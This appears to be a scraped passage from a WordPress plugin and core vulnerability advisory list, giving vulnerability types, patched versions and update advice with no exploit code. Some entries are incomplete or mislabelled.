Recommended Action: Update to version 2.7.11, or a newer patched version

Plugin: Houzez Login Register

Vulnerability: Privilege Escalation
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: WP Crowdfunding

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Klaviyo

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Pay with Vipps and MobilePay for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Real-Time Find and Replace

Vulnerability: Cross-Site Scripting
Patched Version: 3.9
Recommended Action: Update to version 3.9, or a newer patched version

Plugin: Simple Page Ordering

Vulnerability: Regular Expression Denial of Service
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Trustprofile and reviews for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.25
Recommended Action: Update to version 3.25, or a newer patched version

Plugin: EazyDocs – Most Powerful Knowledge base, wiki, Documentation Builder Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Update License
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Image News Slider

Vulnerability: Arbitrary File Upload
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Contact Form 7 Style

Core: WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.11.1
Recommended Action: Update to version 5.11.1, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Constant Contact Forms

Vulnerability: Information Disclosure via Log Files
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Shortcodes Finder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Eventr

Plugin: Link Whisper Free

Vulnerability: Missing Authorization via init()
Patched Version: 0.6.4
Recommended Action: Update to version 0.6.4, or a newer patched version

Plugin: CRM: Contact Management Simplified – UkuuPeople

Vulnerability: Cross-Site Request Forgery to Favorite Addition/Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Marketing Performance

Vulnerability: Unauthenticated Stored Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.6
Recommended Action: Update to version 2.3.6, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘startProcess’ to Arbitrary Redirect via ‘update_link_redirect’ task
Patched Version: 4.5.3
Recommended Action: Update to version 4.5.3, or a newer patched version

Plugin: Bg Bible References

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Email download link

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.1
Recommended Action: Update to version 7.1, or a newer patched version

Plugin: Analytics Cat – Google Analytics Made Easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Maintenance Mode by Supsystic

Vulnerability: Cross Site Request Forgery
Patched Version: 1.7.11
Recommended Action: Update to version 1.7.11, or a newer patched version

Plugin: RESPONSIVE 3D SLIDER

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via render_dropdown
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: JSmol2WP

Plugin: Analyticator

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.1
Recommended Action: Update to version 5.2.1, or a newer patched version

Plugin: Product List / Grid View for Woocommerce

Plugin: Simple Author Box

Vulnerability: Authenticated (Contributor+) Insecure Direct Object Reference to Arbitrary User Sensitive Information Exposure
Patched Version: 2.52
Recommended Action: Update to version 2.52, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: One Click SSL

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Order Notification for WooCommerce – Get Audio Alert on new Orders

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Interactive Medical Drawing of Human Body

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.12
Recommended Action: Update to version 3.8.12, or a newer patched version

Plugin: Portfolio Gallery – Responsive Image Gallery

Vulnerability: Missing Authorization to Arbitrary Gallery Deletion
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Remove CPT base

Vulnerability: Cross-Site Request Forgery to CPT base deletion
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.47
Recommended Action: Update to version 1.47, or a newer patched version

Plugin: WPJAM Basic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.2.1.1
Recommended Action: Update to version 6.2.1.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Student+) SQL Injection
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: SEO Smart Links

Plugin: WP Booking Calendar

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 9.4.3.1
Recommended Action: Update to version 9.4.3.1, or a newer patched version

Plugin: Gallery by BestWebSoft – Customizable Image and Photo Galleries for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: User Enumeration Bypass via REST API
Patched Version: 9.3.3
Recommended Action: Update to version 9.3.3, or a newer patched version

Plugin: WP Food Manager – Restaurant Menu & Online Food Ordering for WooCommerce – Food Delivery & Pickup – Table Reservation

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: BetterDocs – Advanced AI-Driven Documentation, FAQ & Knowledge Base Tool for Elementor & Gutenberg with Encyclopedia, AI Support, Instant Answers

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: wp2syslog

Plugin: NOTICE BOARD

Plugin: WP Crontrol

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: WP Optin Wheel – Gamified Optin Email Marketing Tool for WordPress and WooCommerce

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 11.12.08
Recommended Action: Update to version 11.12.08, or a newer patched version

Plugin: Post State Tags

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clockwork SMS Notfications

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Wise Chat

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Alojapro Booking Engine

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: BA Plus – Before & After Image Slider FREE

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: PixTypes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.15
Recommended Action: Update to version 1.4.15, or a newer patched version

Plugin: Process Steps Template Designer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Membership For WooCommerce – SIMPLE MEMBERSHIP PLANS, RECURRING REVENUE, USER PROFILES & SIGNUPS, CONTENT RESTRICTIONS, AND MEMBER LEVELS WITH WOOCOMMERCE MEMBERSHIP

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Checkout with Zelle on Woocommerce

Vulnerability: Missing Authorization
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Leaky Paywall

Vulnerability: No subtitle
Patched Version: 4.16.6
Recommended Action: Update to version 4.16.6, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Stock Manager for WooCommerce

Vulnerability: Authorization Bypass
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Simple Telegram

Plugin: Embed PDF

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Security Optimizer – The All-In-One Protection Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Appointments Scheduler

Plugin: PPOM – Product Addons & Custom Fields for WooCommerce

Vulnerability: Arbitrary File Upload
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Foliopress WYSIWYG

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.16
Recommended Action: Update to version 2.6.16, or a newer patched version

Plugin: Post Comments as bbPress Topics

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Theme Switcha – Easily Switch Themes for Development and Testing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Podcast Importer SecondLine

Vulnerability: SQL Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: My WP Translate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: WPML

Vulnerability: Reflected Cross-Site Scripting via wp_lang
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: bbPress Move Topics

Vulnerability: PHP Object Injection
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Rise Blocks – A Complete Gutenberg Page Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: GuruWalk Affiliates

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Missing Authorization
Patched Version: 2.0.14
Recommended Action: Update to version 2.0.14, or a newer patched version

Plugin: Blogroll Fun – Show Last Post and Last Update Time

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.8.5
Recommended Action: Update to version 0.8.5, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: WP Meteor Website Speed Optimization Addon

Vulnerability: No subtitle
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Simple Security

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: WooCommerce Bookings

Vulnerability: Insecure Direct Object Reference
Patched Version: 1.15.79
Recommended Action: Update to version 1.15.79, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.0.11
Recommended Action: Update to version 1.7.0.11, or a newer patched version

Plugin: Orange Form

Plugin: WP LINE Notify

Vulnerability: Reflected Cross-Site Scripting via ‘uid’
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Newsletter Popup

Vulnerability: Unauthenticted Stored Cross-Site Scripting via ‘nl_data’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Passster – Password Protect Pages and Content

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.5.5.8
Recommended Action: Update to version 3.5.5.8, or a newer patched version

Plugin: YITH WooCommerce Gift Cards Premium

Vulnerability: Arbitrary File Upload
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in multiple functions in admin/controller.php
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Eonet Manual User Approve

Plugin: Preview Link Generator

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Sensitive Data Exposure
Patched Version: 7.3.15.727
Recommended Action: Update to version 7.3.15.727, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Transbank Webpay

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Announce from the Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Donations

Vulnerability: Unauthenticated Arbitrary Options Change
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Cross-Site Request Forgery leading to attachment deletion & Path Traversal
Patched Version: 1.14.2.2
Recommended Action: Update to version 1.14.2.2, or a newer patched version

Plugin: WP-PostRatings

Vulnerability: SQL Injection
Patched Version: 1.62
Recommended Action: Update to version 1.62, or a newer patched version

Plugin: Page View Count

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: WP-chgFontSize

Plugin: Responsive Pricing Table

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Bonus for Woo

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.3
Recommended Action: Update to version 5.8.3, or a newer patched version

Plugin: multi-plugin-installer

Vulnerability: Arbitrary File Read
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: MapifyLite (by MapifyPro)

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Redux Framework

Vulnerability: Incorrect Authorization Leading to Arbitrary Plugin Installation and Post Deletion
Patched Version: 4.2.13
Recommended Action: Update to version 4.2.13, or a newer patched version

Plugin: Blog Floating Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: Grab & Save

Plugin: Add Edit Delete Listing Module

Plugin: Woocommerce Order address Print

Plugin: Comments Ratings

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: SpiderVPlayer

Plugin: WordPress Countdown Widget

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 3.1.9.2
Recommended Action: Update to version 3.1.9.2, or a newer patched version

Plugin: ImageInject

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.26.9
Recommended Action: Update to version 2.26.9, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Media Uploads
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via wpbe_update_page_field
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Yellow Swordfish Simple Forum

Plugin: RB Internal Links

Vulnerability: Cross-Site Request Forgery to Settings update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPGraphQL

Vulnerability: Unauthenticated Comment Creation
Patched Version: 0.3.0
Recommended Action: Update to version 0.3.0, or a newer patched version

Plugin: Post Status Notifier Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10.1
Recommended Action: Update to version 1.10.1, or a newer patched version

Plugin: Request a Quote

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Testimonial – WordPress Testimonial Showcase Plugin Grid Plus Testimonial Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery to Stripe Integration Deletion
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Chronoforms

Plugin: Waitlist Woocommerce ( Back in stock notifier )

Vulnerability: Cross-Site Request Forgery to Arbitrary Options Update
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Slider Factory – Responsive Photo Slider, Image Slider, Video Slider, Carousel Slideshow

Vulnerability: Missing Authorization
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: WHOIS

Plugin: User Login History

Vulnerability: SQL Injection via Order By
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_save_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Social Sharing

Plugin: Timeline Calendar

Plugin: WordPress Database Administrator

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Event Registration

Vulnerability: PHP Object Injection
Patched Version: 6.03.01
Recommended Action: Update to version 6.03.01, or a newer patched version

Plugin: vodpod-video-gallery

Plugin: OAuth Client by DigitialPixies

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.53
Recommended Action: Update to version 2.53, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.4.1
Recommended Action: Update to version 2.1.4.1, or a newer patched version

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via id Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: Cross-Site Scripting
Patched Version: 4.52
Recommended Action: Update to version 4.52, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Subscriber+ SQL Injection
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.18.5
Recommended Action: Update to version 1.18.5, or a newer patched version

Plugin: WP Intercom – Slack for WordPress

Plugin: E-Search

Vulnerability: Reflected Cross-Site Scripting via title_az parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Privilege Escalation
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 6.15.15.3
Recommended Action: Update to version 6.15.15.3, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘clear_page_cache’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Branded Social Images – Open Graph Images with logo and extra text layer

Vulnerability: Missing Authorization leading to Unauthenticated Plugin Settings Updates
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: cforms

Vulnerability: Cross-Site Scripting
Patched Version: 10.2
Recommended Action: Update to version 10.2, or a newer patched version

Plugin: Random image gallery with pretty photo zoom

Vulnerability: DOM Cross-Site Scripting
Patched Version: 7.5
Recommended Action: Update to version 7.5, or a newer patched version

Plugin: WP eCommerce Shop Styling

Vulnerability: Directory Traversal
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: SendPress Newsletters

Plugin: Download Manager

Vulnerability: Authenticated File Upload
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Remote Code Execution
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Image Metadata Cruncher

Vulnerability: Reflected Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Landing Page – Squeeze Page – Responsive Landing Page Builder Free – WP Lead Plus X

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Reflected Cross-Site Scripting via section_id
Patched Version: 5.2.4.2
Recommended Action: Update to version 5.2.4.2, or a newer patched version

Plugin: WordPress Poll

Vulnerability: SQL Injection
Patched Version: 34.06
Recommended Action: Update to version 34.06, or a newer patched version

Core: WordPress

Vulnerability: Media Related Security Issue
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WP Responsive Menu

Vulnerability: Missing Authorization to Settings Update & Stored Cross-Site Scripting
Patched Version: 3.1.7.1
Recommended Action: Update to version 3.1.7.1, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress Shout Box Widget

Plugin: WP eCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.8.7.2
Recommended Action: Update to version 3.8.7.2, or a newer patched version

Plugin: Headless CMS

Plugin: All Users Messenger

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Message Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rate My Post – Star Rating Plugin by FeedbackWP

Vulnerability: IP Address Spoofing
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: Cross Site Request Forgery
Patched Version: 3.2.6
Recommended Action: Update to version 3.2.6, or a newer patched version

Plugin: WP Jump Menu

Plugin: Pricing Table by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: AntiVirus

Vulnerability: Full Path Disclosure
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP YouTube Live

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: The Buffer Button

Plugin: Contact Form Email

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.3.38
Recommended Action: Update to version 1.3.38, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.22
Recommended Action: Update to version 5.22, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: WooCommerce Multivendor Marketplace <= 3.4.11
Patched Version: 3.4.12
Recommended Action: Update to version 3.4.12, or a newer patched version

Plugin: Better Font Awesome

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Adaptive Images for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.6.69
Recommended Action: Update to version 0.6.69, or a newer patched version

Plugin: Dialogs

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Validation Bypass via Email Field
Patched Version: 3.4.27.1
Recommended Action: Update to version 3.4.27.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Core: WordPress

